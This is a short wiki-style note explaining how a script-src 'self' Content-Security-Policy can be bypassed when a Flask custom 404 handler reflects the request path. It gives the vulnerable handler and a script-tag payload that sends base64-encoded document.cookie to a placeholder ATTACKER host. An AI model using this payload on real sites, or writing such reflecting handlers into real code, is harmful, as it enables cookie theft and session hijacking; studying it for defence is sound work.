csp-bypass-custom-404
Bypass CSP when a custom 404 page is present
With:
resp.headers['Content-Security-Policy'] = "script-src 'self';
And a custom 404 page like:
@app.errorhandler(404) def page_not_found(error): path = request.path return f"{path} not found"
It's possible to reflect JS in the same origin.
E.g.
<script src='ab.c/;fetch(`ATTACKER/${btoa(document.cookie)}`) //'>
csp-bypass-custom-404.txt · Last modified: 2024/11/01 09:07 by osorin